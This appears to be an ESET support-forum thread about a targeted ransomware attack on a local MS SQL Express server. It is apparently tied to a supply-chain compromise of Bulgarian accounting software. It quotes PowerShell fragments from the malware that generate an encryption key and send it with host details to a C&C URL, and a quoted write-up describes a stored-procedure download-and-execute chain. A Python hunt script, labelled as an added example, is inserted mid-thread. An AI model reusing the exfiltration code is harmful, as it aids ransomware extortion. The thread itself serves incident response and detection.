cyberfear@decryptor

  • Administrators

First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them:

image.png

Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks:
https://www.abuseipdb.com/check/198.147.26.74

The following detections were stemming from a compromised MS SQL server:

a variant of MSIL/HackTool.BadPotato.C trojan
a variant of Win64/Kryptik.EDF trojan
a variant of Win64/Agent.DJU trojan

I'd suggest to:
1. Remove all IDS exceptions
2. Supply me with:
a) a couple of encrypted files, ideally Office documents
b) the ransomware note with payment instructions, if it exists


1 hour ago, Marcos said:

First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them:

image.png

Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks:
https://www.abuseipdb.com/check/198.147.26.74

The following detections were stemming from a compromised MS SQL server:

a variant of MSIL/HackTool.BadPotato.C trojan
a variant of Win64/Kryptik.EDF trojan
a variant of Win64/Agent.DJU trojan

I'd suggest to:
1. Remove all IDS exceptions
2. Supply me with:
a) a couple of encrypted files, ideally Office documents
b) the ransomware note with payment instructions, if it exists

I am attaching some encrypted files and a ransomware note.

Infected.zip


  • Administrators

Unfortunately the files didn't help to determine how files were encrypted. It could have been a ransomware or a legit encryption tool that an adversary ran after gaining access to the machine.


  • Administrators

Just run a full disk scan to make sure that no malware is detected. Your computer should be clean. The ransomware usually removes itself, or the adversary deletes it after encryption.


1 hour ago, itman said:

If the files are encrypted with the BlackMatter ransomware, it may be possible to decrypt them: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902

How do I know this?


  • Administrators

It's a new PowerShell malware; it will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack, since it has not been found on any other machine with ESET installed so far.


Yes the attack is targeted, I believe it is happening through a backup program of an accounting program I use.


9 minutes ago, Marcos said:

It's a new PowerShell malware; it will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack, since it has not been found on any other machine with ESET installed so far.

Will we be protected in the future?


26 minutes ago, Marcos said:

It's a new Powershell malware

Would ESET's recommended anti-ransomware rule to block any child process startup from PowerShell.exe have detected and blocked it?


  • Administrators

The PowerShell script infects local MS SQL databases by running "sqlcmd -S localhost ..." except 'master', 'tempdb', 'model', 'msdb'. Unfortunately the encryption key is random:

$PSRKey = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_})

and is sent to the attacker's C&C server:

$C2Data = @"
[>] Key: $PSRKey
[>] Hostname: $computer
[>] Current User: $domain$user
[>] Current Time: $time
[>] Local IP: $localIP
[>] Public IP: $publicIP
"@

$url = "http://$C2Server`:$C2Port/data"


Posted (edited)

Perhaps Mallox ransomware:

Quote

The attacker created a stored procedure named cmd_exec that calls the SqlShell malware.

Finally, it called the stored procedure to execute a command passed in parameter which performs the following actions:

  • Using echo and redirect, it creates a PowerShell script that downloads a binary and saves it to the ProgramData folder;
  • It then calls PowerShell to execute the script;
  • Finally, it uses WMIC to execute the binary.

https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/

Edited by itman
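Both the PowerShell/Filecoder description above (a script under SQL Server driving sqlcmd against the local databases) and the Mallox write-up (a stored procedure launching cmd.exe, then PowerShell, then WMIC) share one observable: the SQL Server service process ends up as the ancestor of a shell. The following is an added detection example, not code from this thread, from ESET or from Sekoia. It assumes process-creation telemetry in a Sysmon Event ID 1 style reduced to pid, parent pid, image name and command line; the events, paths and command lines below are constructed placeholders, not indicators from the case.

```python
"""Hunt for shells and sqlcmd spawned underneath sqlservr.exe.

Added example (not from the thread). Assumes process-creation telemetry
reduced to pid / parent pid / image / command line. SAMPLE_EVENTS is
constructed for the demo; the paths and command lines are placeholders.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # base name of the executable, e.g. "cmd.exe"
    cmdline: str


# A SQL Server instance has no business spawning an interactive shell, PowerShell,
# WMIC or sqlcmd on its own; a stored procedure wrapping xp_cmdshell does exactly that.
SQL_SERVICE = "sqlservr.exe"
SUSPECT_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wmic.exe", "sqlcmd.exe"}

# Constructed telemetry: one compromised instance plus a benign user session.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 4, "services.exe", "C:\\Windows\\System32\\services.exe"),
    ProcEvent(200, 100, "sqlservr.exe", "sqlservr.exe -sSQLEXPRESS"),
    # xp_cmdshell-style launch: cmd writes a script under ProgramData (placeholder path)
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c echo [placeholder] > C:\\ProgramData\\placeholder.ps1"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\placeholder.ps1"),
    # the script then drives sqlcmd against the local instance
    ProcEvent(500, 400, "sqlcmd.exe", "sqlcmd -S localhost -Q ..."),
    # benign: a user opens PowerShell from Explorer, must not be flagged
    ProcEvent(600, 4, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(700, 600, "powershell.exe", "powershell.exe"),
]


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk parent links upward from pid; child first.
    Stops at unknown pids and guards against cycles from pid reuse."""
    chain: List[ProcEvent] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev)
        pid = ev.ppid
    return chain


def sql_spawned_chain(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[List[ProcEvent]]:
    """Return the chain from the nearest sqlservr.exe ancestor down to ev,
    or None when SQL Server is not in ev's ancestry."""
    chain = ancestry(ev.pid, by_pid)
    for i, anc in enumerate(chain[1:], start=1):
        if anc.image.lower() == SQL_SERVICE:
            return list(reversed(chain[: i + 1]))
    return None


def find_sql_spawned(events: List[ProcEvent]) -> List[dict]:
    """One alert per suspect process whose ancestry passes through sqlservr.exe."""
    by_pid = {e.pid: e for e in events}
    alerts: List[dict] = []
    for ev in events:
        if ev.image.lower() not in SUSPECT_IMAGES:
            continue
        chain = sql_spawned_chain(ev, by_pid)
        if chain is None:
            continue
        alerts.append({
            "pid": ev.pid,
            "image": ev.image,
            "chain": " > ".join(p.image for p in chain),
            "cmdline": ev.cmdline,
        })
    return alerts


if __name__ == "__main__":
    for a in find_sql_spawned(SAMPLE_EVENTS):
        print(f"[!] pid {a['pid']}: {a['chain']}\n    {a['cmdline']}")
```

On the sample data this flags cmd.exe, powershell.exe and sqlcmd.exe under sqlservr.exe and leaves the user's Explorer-launched PowerShell alone. It is the complement of the "block child processes of PowerShell.exe" rule asked about above: that rule looks downward from PowerShell, this check looks at what launched it. The same ancestry walk is what an EDR or a HIPS rule keyed on the parent image name is doing; the point of keeping the whole chain in the alert is that a defender sees the stored-procedure origin rather than a bare PowerShell launch.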

On 5/19/2024 at 4:20 PM, ivaylogrig said:

I am attaching some encrypted files and a ransomware note.

Infected.zip

Can you upload these files to a cloud drive: Google or Yandex, and provide a link to download and determine the type of ransomware based on the encrypted file and the ransom note?


  • Administrators

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.


Posted (edited)
3 hours ago, Marcos said:

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.

The beginnings of another infamous Petya-like attack?

Quote

It was believed that the software update mechanism of M.E.Doc—a Ukrainian tax preparation program that, according to F-Secure analyst Mikko Hyppönen, "appears to be de facto" among companies doing business in the country—had been compromised to spread the malware.[13][18][19] Analysis by ESET found that a backdoor had been present in the update system for at least six weeks prior to the attack, describing it as a "thoroughly well-planned and well-executed operation".[20] The developers of M.E.Doc denied that they were entirely responsible for the cyberattack, stating that they too were victims.[18][21][22][23]

https://en.wikipedia.org/wiki/Petya_(malware_family)

Edited by itman